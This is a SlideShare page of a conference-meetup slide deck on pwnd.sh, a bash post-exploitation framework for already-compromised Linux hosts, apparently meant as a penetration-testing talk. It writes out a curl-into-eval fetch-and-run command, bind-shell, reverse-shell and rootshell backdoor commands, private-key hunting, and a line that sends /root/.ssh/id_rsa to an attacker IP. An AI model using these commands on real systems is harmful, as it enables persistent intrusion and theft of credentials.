Agenda
SCENARIO: Have already compromised a Linux machine

What’s next after exploiting

Different functionalities of pw...

./about_me.py
[+] Got name : Chandrapal
[+] Website : chandrapal.me
[+] Founder of : Hack with GitHub
[+] Social Accounts ...

Author
Itzek Kotler (@itzikkotler)
CTO & Co-founder @ SafeBreach
http://ikotler.org

What plans in Post Exploitation Phase
3 possible things:
●
Further penetrate into Network / Endpoints
●
Get a firmer footh...

About the tool
●
Newly released
●
Easy as it is written in BASH
●
Interactive and allows to create custom scripts
●
Licens...

How can I get it ?
> git clone https://github.com/SafeBreach-Labs/pwndsh.git
> cd pwndsh

Why Bash and not Python / Perl / Ruby ?
●
Same Bash for different Platforms (Mac, Linux, etc) and different
architectures ...

Dependencies, or not to be Depended?
●
No:
– Consistent functionality across different Platforms, CPUs etc.
– Smaller and ...

Why In-memory?
●
Constraints found:
– Filesystem is readonly
– “No space left on device”
Solution: In-memory loading
●
Wor...

Metasploitable
192.168.70.101
Ubuntu
Find it
It’s me
192.168.70.100
Scenario :

In-Memory Loading Method #1
X=`curl -fsSL
"https://raw.githubusercontent.com/SafeBreac
h-Labs/pwndsh/master/bin/pwnd.sh"`
...

What if the system is on
Intranet without
Internet ?
What if the system is in
Internet Censored
country where GitHub is
bl...

In-Memory Loading Method #2
● On source computer
curl -fsSL
"https://raw.githubusercontent.com/SafeBreach-
Labs/pwndsh/mas...

On-Disk Loading Method
> curl -OfsSL
"https://raw.githubusercontent.com/SafeBrea
ch-Labs/pwndsh/master/bin/pwnd.sh"
> sour...

Scanning a Host
(pwnd) $ portscanner 192.168.2.132 22/tcp

Scanning Networks
(pwnd)$ for ip in $(seq 1 254); do
portscanner 192.168.0.$ip 123/udp; done

Local Backdoor Example
(pwnd)$ install_rootshell
# Remember to invoke rootshell with ‘-p’

Remote Backdoor Example
(pwnd)$ bindshell 1234
# Connect to host at 1234/tcp for rootshell

Remote Backdoor Example #2
# On 192.168.2.1 run: nc –l 1234
(pwnd)$ reverseshell 192.168.2.1 1234

Searching for Goodies
(pwnd)$ hunt_privkeys

Exfil Example
# On attacker machine run: nc –l <port>
(pwnd)$ cat /root/.ssh/id_rsa | base64 |
over_socket <attacker IP> <...

Plugin Support
●
You can create plugins and add you to the project
●
All you need is:
– GitHub account
– Bash knowledge
– ...

References
●
https://github.com/SafeBreach-Labs/pwndsh
●
http://www.ikotler.org/JustGotPWND.pdf
●
https://www.youtube.com/...

Upcoming SlideShare

Loading in …5

pwnd.sh

pwnd.sh - A post exploitation tool written entirely in bash.
Presented in Null meet on 17/12/16

Chandrapal Badshah

No Filter: The Inside Story of Instagram Sarah Frier

(4.5/5)

Free

Bezonomics: How Amazon Is Changing Our Lives and What the World's Best Companies Are Learning from It Brian Dumaine

(4.5/5)

Free

So You Want to Start a Podcast: Finding Your Voice, Telling Your Story, and Building a Community That Will Listen Kristen Meinzer

(5/5)

Free

SAM: One Robot, a Dozen Engineers, and the Race to Revolutionize the Way We Build Jonathan Waldman

(5/5)

Free

The Future Is Faster Than You Think: How Converging Technologies Are Transforming Business, Industries, and Our Lives Peter H. Diamandis

(5/5)

Free

Autonomy: The Quest to Build the Driverless Car—And How It Will Reshape Our World Lawrence D. Burns

(5/5)

Free

Life After Google: The Fall of Big Data and the Rise of the Blockchain Economy George Gilder

(4/5)

Free

Everybody Lies: Big Data, New Data, and What the Internet Can Tell Us About Who We Really Are Seth Stephens-Davidowitz

(4/5)

Free

Live Work Work Work Die: A Journey into the Savage Heart of Silicon Valley Corey Pein

(4/5)

Free

From Gutenberg to Google: The History of Our Future Tom Wheeler

(2/5)

Free

Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think James Vlahos

(3/5)

Free

Future Presence: How Virtual Reality Is Changing Human Connection, Intimacy, and the Limits of Ordinary Life Peter Rubin

(4/5)

Free

How to Lie with Maps, Third Edition Mark Monmonier

(4.5/5)

Free

Wizard:: The Life and Times of Nikolas Tesla Marc Seifer

(3/5)

Free

On War: With linked Table of Contents Carl von Clausewitz

(4.5/5)

Free

Island of the Lost: An Extraordinary Story of Survival at the Edge of the World Joan Druett

(4/5)

Free

Second Nature: Scenes from a World Remade Nathaniel Rich

(5/5)

Free

Spooked: The Trump Dossier, Black Cube, and the Rise of Private Spies Barry Meier

(5/5)

Free

An Ugly Truth: Inside Facebook’s Battle for Domination Sheera Frenkel

(4/5)

Free

Uncanny Valley: A Memoir Anna Wiener

(4/5)

Free

If Then: How the Simulmatics Corporation Invented the Future Jill Lepore

(4.5/5)

Free

The Science of Time Travel: The Secrets Behind Time Machines, Time Loops, Alternate Realities, and More! Elizabeth Howell

(3.5/5)

Free

Liftoff: Elon Musk and the Desperate Early Days That Launched SpaceX Eric Berger

(5/5)

Free

Bitcoin Billionaires: A True Story of Genius, Betrayal, and Redemption Ben Mezrich

(4.5/5)

Free

The Players Ball: A Genius, a Con Man, and the Secret History of the Internet's Rise David Kushner

(4.5/5)

Free

A World Without Work: Technology, Automation, and How We Should Respond Daniel Susskind

(4.5/5)

Free

Lean Out: The Truth About Women, Power, and the Workplace Marissa Orr

(4/5)

Free

Blockchain: The Next Everything Stephen P Williams

(4/5)

Free

Digital Renaissance: What Data and Economics Tell Us about the Future of Popular Culture Joel Waldfogel

(3.5/5)

Free

User Friendly: How the Hidden Rules of Design Are Changing the Way We Live, Work, and Play Cliff Kuang

(4/5)

Free

Ten Arguments for Deleting Your Social Media Accounts Right Now Jaron Lanier

(4/5)

Free

Chaos Monkeys Revised Edition: Obscene Fortune and Random Failure in Silicon Valley Antonio Garcia Martinez

(4/5)

Free

Be the first to comment

Narasimha Murthy Sagi
4 years ago

Views

Total views

380

On SlideShare

From Embeds

Number of Embeds

Actions

Downloads

Comments

Likes

pwnd.sh

1. PWND.sh Post Exploitation Framework
2. Agenda SCENARIO: Have already compromised a Linux machine  What’s next after exploiting  Different functionalities of pwnd.sh  Q/A
3. ./about_me.py [+] Got name : Chandrapal [+] Website : chandrapal.me [+] Founder of : Hack with GitHub [+] Social Accounts : @bnchandrapal @HackwithGithub [-] Life : Traceback (most recent call last) : File “about_me.py”, line 150, in <module> TypeError: Can’t convert ‘infosec’ object to developer implicitly
4. Author Itzek Kotler (@itzikkotler) CTO & Co-founder @ SafeBreach http://ikotler.org
5. What plans in Post Exploitation Phase 3 possible things: ● Further penetrate into Network / Endpoints ● Get a firmer foothold on the Network / Endpoints ● Start Exfiltrating Data out of the Network / Endpoints
6. About the tool ● Newly released ● Easy as it is written in BASH ● Interactive and allows to create custom scripts ● License: 3-Clause BSD ● Both In-Memory and On-Disk deployment available ● Pipeline integrates pwnd.sh with other programs also
7. How can I get it ? > git clone https://github.com/SafeBreach-Labs/pwndsh.git > cd pwndsh
8. Why Bash and not Python / Perl / Ruby ? ● Same Bash for different Platforms (Mac, Linux, etc) and different architectures (x86, x64) ● It is the default shell on most systems ● There is socket programming in Bash (--enable-net-redirections) ● You cannot fallback to Bash from Python, Perl, etc but you can UPGRADE to Python, Perl, etc from Bash
9. Dependencies, or not to be Depended? ● No: – Consistent functionality across different Platforms, CPUs etc. – Smaller and simpler code base ● Yes: – Don't reinvent the wheel – Everything a Dependency in Shell Terms (ls, cat, etc) (Good coders create, Great coders reuse) PWND.SH – built with least amount of dependencies
10. Why In-memory? ● Constraints found: – Filesystem is readonly – “No space left on device” Solution: In-memory loading ● Works even if the Filesystem is mounted to be Read-only ● Multiple Versions can co-exists (in Multiple Shells) ● Disappears after Reboot
11. Let’s Start
12. Metasploitable 192.168.70.101 Ubuntu Find it It’s me 192.168.70.100 Scenario :
13. In-Memory Loading Method #1 X=`curl -fsSL "https://raw.githubusercontent.com/SafeBreac h-Labs/pwndsh/master/bin/pwnd.sh"` eval "$X"
14. What if the system is on Intranet without Internet ? What if the system is in Internet Censored country where GitHub is blocked ?
15. In-Memory Loading Method #2 ● On source computer curl -fsSL "https://raw.githubusercontent.com/SafeBreach- Labs/pwndsh/master/bin/pwnd.sh" < Ctrl+Shift+C > ● On destination computer X=”<Ctrl+V>” eval “$X”
16. On-Disk Loading Method > curl -OfsSL "https://raw.githubusercontent.com/SafeBrea ch-Labs/pwndsh/master/bin/pwnd.sh" > source pwnd.sh
17. Scanning a Host (pwnd) $ portscanner 192.168.2.132 22/tcp
18. Scanning Networks (pwnd)$ for ip in $(seq 1 254); do portscanner 192.168.0.$ip 123/udp; done
19. Local Backdoor Example (pwnd)$ install_rootshell # Remember to invoke rootshell with ‘-p’
20. Remote Backdoor Example (pwnd)$ bindshell 1234 # Connect to host at 1234/tcp for rootshell
21. Remote Backdoor Example #2 # On 192.168.2.1 run: nc –l 1234 (pwnd)$ reverseshell 192.168.2.1 1234
22. Searching for Goodies (pwnd)$ hunt_privkeys
23. Exfil Example # On attacker machine run: nc –l <port> (pwnd)$ cat /root/.ssh/id_rsa | base64 | over_socket <attacker IP> <port>
24. Plugin Support ● You can create plugins and add you to the project ● All you need is: – GitHub account – Bash knowledge – Time
25. Q&A We have HACKED WITH GITHUB
26. References ● https://github.com/SafeBreach-Labs/pwndsh ● http://www.ikotler.org/JustGotPWND.pdf ● https://www.youtube.com/watch?v=kWU-fDv2wjM
27. Thank You